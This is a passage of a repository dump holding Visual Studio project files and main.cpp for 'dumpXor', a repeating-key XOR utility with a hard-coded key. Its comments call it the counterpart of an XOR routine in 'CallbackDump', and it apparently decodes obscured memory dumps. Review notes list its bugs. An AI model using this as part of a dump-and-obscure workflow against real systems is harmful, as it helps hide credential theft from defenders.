<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<BufferSecurityCheck>false</BufferSecurityCheck>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>false</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="main.cpp" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>
================================================
FILE: dumpXor/dumpXor/dumpXor.vcxproj.filters
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="源文件">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="头文件">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
<Filter Include="资源文件">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="main.cpp">
<Filter>源文件</Filter>
</ClCompile>
</ItemGroup>
</Project>
================================================
FILE: dumpXor/dumpXor/dumpXor.vcxproj.user
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>
================================================
FILE: dumpXor/dumpXor/main.cpp
================================================
#include <stdio.h>
// Byte-by-byte repeating-key XOR of argv[1] into argv[2].
//
// Usage: dumpXor <source> <dest>
// Because XOR is its own inverse this both "encrypts" and "decrypts"; it is
// the counterpart of Xorcrypt() in CallbackDump/global.h.
//
// Review notes:
//  * argv[1] / argv[2] are read without checking argc; with fewer than two
//    arguments fopen receives NULL.
//  * Neither fopen result is checked; a missing input file makes feof/fread
//    dereference NULL.
//  * `keylen = sizeof(key)` is the size of a `char*` (8 on x64, 4 on Win32),
//    not strlen("thisisgood"), so only the first 8 (or 4) key bytes cycle.
//    This matches the identical mistake in CallbackDump only when both
//    programs are built for the same bitness.
//  * `tBuffer` is unused; `fBuffer` is a one-byte array.
//  * The read loop uses the feof-before-read pattern; the inner feof test
//    avoids processing a stale byte after the final short read.
//  * Runs at most one byte per fread/fwrite call (no buffering beyond stdio).
int main(int argc, char* argv[]) {
    int keylen, index = 0;
    char* source, * dest, fBuffer[1], tBuffer[20], ckey;
    FILE* fSource, * fDest;
    source = argv[1]; // source file
    dest = argv[2]; // destination file
    char* key = (char*)"thisisgood";
    // key length -- actually sizeof(char*), see review notes
    keylen = sizeof(key);
    fSource = fopen(source, "rb");
    fDest = fopen(dest, "wb");
    while (!feof(fSource)) {
        fread(fBuffer, 1, 1, fSource); // read 1 byte
        if (!feof(fSource)) {
            ckey = key[index % keylen]; // cycle through the key
            *fBuffer = *fBuffer ^ ckey; // xor encrypt
            fwrite(fBuffer, 1, 1, fDest); // write to output file
            index++;
        }
    }
    fclose(fSource);
    fclose(fDest);
}
================================================
FILE: dumpXor/dumpXor.sln
================================================
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 17
VisualStudioVersion = 17.3.32825.248
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "dumpXor", "dumpXor\dumpXor.vcxproj", "{9CC63DB2-7FC6-4D54-A0E4-CD91E124BFD4}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{9CC63DB2-7FC6-4D54-A0E4-CD91E124BFD4}.Debug|x64.ActiveCfg = Debug|x64
{9CC63DB2-7FC6-4D54-A0E4-CD91E124BFD4}.Debug|x64.Build.0 = Debug|x64
{9CC63DB2-7FC6-4D54-A0E4-CD91E124BFD4}.Debug|x86.ActiveCfg = Debug|Win32
{9CC63DB2-7FC6-4D54-A0E4-CD91E124BFD4}.Debug|x86.Build.0 = Debug|Win32
{9CC63DB2-7FC6-4D54-A0E4-CD91E124BFD4}.Release|x64.ActiveCfg = Release|x64
{9CC63DB2-7FC6-4D54-A0E4-CD91E124BFD4}.Release|x64.Build.0 = Release|x64
{9CC63DB2-7FC6-4D54-A0E4-CD91E124BFD4}.Release|x86.ActiveCfg = Release|Win32
{9CC63DB2-7FC6-4D54-A0E4-CD91E124BFD4}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {5CB8FD33-C656-4F9D-A594-3BF54C71E196}
EndGlobalSection
EndGlobal